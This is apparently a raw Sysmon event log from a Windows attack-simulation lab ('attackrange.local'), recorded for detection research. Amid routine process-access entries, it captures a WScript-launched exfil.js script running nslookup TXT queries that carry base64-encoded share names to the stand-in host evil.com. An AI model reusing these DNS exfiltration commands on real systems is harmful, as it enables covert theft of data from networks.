14:16:26.952{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-EB3F-000000005F02}4616C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.952{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-EB3F-000000005F02}4616C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.937{2E1864BB-17BA-629A-EB3F-000000005F02}46165104C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-EA3F-000000005F02}7832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.921{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-EB3F-000000005F02}4616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.905{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.905{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-EA3F-000000005F02}7832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.905{2E1864BB-17A1-629A-783D-000000005F02}55527784C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-EA3F-000000005F02}7832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.912{2E1864BB-17BA-629A-EA3F-000000005F02}7832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliikib.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.905{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfvujj.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.852{2E1864BB-17BA-629A-E83F-000000005F02}5126580C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-E93F-000000005F02}5112C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.837{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.837{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.837{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-E93F-000000005F02}5112C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.837{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.837{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.837{2E1864BB-17BA-629A-E73F-000000005F02}21725108C:\Windows\system32\cmd.exe{2E1864BB-17BA-629A-E93F-000000005F02}5112C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.847{2E1864BB-17BA-629A-E93F-000000005F02}5112C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-E73F-000000005F02}2172C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfvujj.tmp 2>&1 10341000x8000000000000000199068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.800{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-E83F-000000005F02}512C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.800{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-E83F-000000005F02}512C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.783{2E1864BB-17BA-629A-E83F-000000005F02}5126580C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-E73F-000000005F02}2172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.768{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-E83F-000000005F02}512C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.768{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.768{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.768{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.768{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.768{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-E73F-000000005F02}2172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.768{2E1864BB-17A1-629A-783D-000000005F02}55527444C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-E73F-000000005F02}2172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.772{2E1864BB-17BA-629A-E73F-000000005F02}2172C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfvujj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.768{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljsxjluh.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 